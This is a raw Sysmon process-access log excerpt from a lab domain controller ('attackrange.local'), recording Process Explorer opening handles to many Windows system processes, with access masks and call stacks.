15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784690Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784689Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784688Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784687Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784686Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784685Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784684Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784683Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784682Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784681Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784680Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784679Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784678Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784677Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784676Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784675Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784674Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784673Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784672Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784671Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784670Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784669Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784668Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 